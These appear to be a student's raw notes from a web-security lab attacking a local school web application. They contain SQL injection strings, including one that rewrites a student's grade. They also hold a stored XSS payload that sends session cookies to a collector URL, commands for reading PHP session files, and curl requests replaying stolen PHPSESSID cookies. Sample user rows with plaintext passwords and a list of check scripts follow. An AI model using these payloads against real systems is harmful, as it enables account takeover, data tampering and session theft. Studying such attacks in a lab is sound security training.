
' OR '1' = '1' LIMIT 1  --
' OR 1=1; --

'; UPDATE `Cours_info` SET `note` = 19 WHERE `stu_id`=1; --


CREATE USER 'user1'@'%' IDENTIFIED BY 'user1';


GRANT SELECT, INSERT, UPDATE, DELETE ON `insa_db`.`Posts` TO 'user1'@'%';
GRANT SELECT, INSERT, UPDATE, DELETE ON `insa_db`.`Cours_info` TO 'user1'@'%';
GRANT SELECT, INSERT, UPDATE, DELETE ON `insa_db`.`Users` TO 'user1'@'%';


FLUSH PRIVILEGES;

ls -l /var/lib/php/sessions

cat /var/lib/php/sessions/sess_

<script>document.write('<img src="http://127.0.0.1:8000/index.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script>

curl -i -L -X GET "http://127.0.0.1/pages/user/user_page.php?id=4" -b 



curl -L -i -X POST "http://127.0.0.1/pages/public/login.php" \
    -d "email=john.doe@insa-cvl.fr" \
    -d "password=111" \
    -d "login_btn=$LOGIN_BTN" 

tail -f /var/log/apache2/error.log


curl -i -L -X GET "http://127.0.0.1/pages/user/user_page.php?id=4" -b "PHPSESSID="





john.doe@insa-cvl.fr 	111 	Joe 	John 	M 	1990-01-01 	123 Main St 	0123456789 	default 	Student
jane.doe@insa-cvl.fr 	azerty 	Doe 	Jane 	M 	1992-05-15 	456 Elm St 	9876543210 	default 	Professor
admin@insa-cvl.fr 	abcdefg 	Admin 	User 	M 	1985-09-30 	789 Oak St 	5678901234 	default 	Professor
1 	1 	<script>document.write('<img src="http://127.0.0.1... 	1 	M 	2024-12-10 	1 	1 	1_1.jpg 	Student
tom@gmail.com 	1234 	CONSTANS 	Mathis 	M 	2003-11-27 	123 rue Exemple 	0606060706 	CONSTANS_mathis.jpg 	Student
9 	2 	2 	2



check_contact_search
check_forum_search
check_cours_comment
check_cours
check_receive_mail
check_note
=============================================================================

check_receive_mail.sh   
check_add_post.sh                 
check_contact_search.sh          
check_contact.sh          
check_cours.sh                     
check_forum_search.sh     
check_IDOR.sh             
check_login_plus.sh       
check_login.sh           
check_mailpage.sh         
check_notes.sh            
check_ports.sh            
check_register.sh 
check_send_mail.sh
check_userpage.sh 


student07@insa-cvl.fr 	55534937 	Todd 	Megan 	M 	2003-12-19 	PSC 7496, Box 9557, APO AE 12597 	(614)150-2062x7045 	student07.png 	Student
